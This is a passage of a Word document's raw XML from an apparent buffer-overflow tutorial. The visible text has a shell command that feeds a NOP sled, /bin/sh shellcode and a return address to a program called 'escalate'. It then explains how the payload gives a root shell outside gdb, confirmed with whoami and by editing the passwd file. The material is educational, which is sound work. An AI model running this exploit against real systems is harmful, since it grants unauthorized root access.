        <w:t>./escalate `python -c 'print "\x90"*359 + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" + "\x80\xd4\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7687B9BE" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We use </w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\x</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to denote to python that the following number is a hex number instead of printable characters.</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">If we load this into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, we get the following result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEDA409" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CD2B0D5" wp14:editId="29D6972D">
            <wp:extent cx="5943600" cy="28486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48610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABACA67" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not escalated to root permissions, so we get a user level shell (I am still the user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). However, if we run this outside of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, we get a root shell instance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF3C928" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28725943" wp14:editId="45D736DB">
            <wp:extent cx="5943600" cy="198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1578C10D" w14:textId="77777777" w:rsidR="00247450" w:rsidRPr="00247450" w:rsidRDefault="00247450" w:rsidP="00247450">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">It worked! The root shell is denoted by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and I show that I can now edit the passwd file. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> returns </w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00247450">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5492C811" w14:textId="77777777" w:rsidR="00244E19" w:rsidRDefault="00247450"/>
    <w:sectPr w:rsidR="00244E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E336C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EE28F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AB45A57"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F920E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450"/>
    <w:rsid w:val="00247450"/>
    <w:rsid w:val="00322F88"/>
    <w:rsid w:val="00ED42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97230"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3A1B7B29-A48B-46F2-961F-E46E09544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474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24745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7450"/>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247450"/>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24745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47450"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00247450"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00247450"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00247450"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00247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4745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4301365">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1930501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en.wikipedia.org/wiki/Buffer_overflow" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Address_space_layout_randomization" TargetMode="Externa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r00t.org/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.danielmills.org/downloads/buffer_overflow/shellcode.txt" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://phrack.org/issues/49/14.html" TargetMode="Externa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www.danielmills.org/downloads/buffer_overflow/escalate.cpp"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1123</Words>
  <Characters>6404</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>53</Lines>
  <Paragraphs>15</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>7512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Mills</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Daniel Mills</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-14T23:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-14T23:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>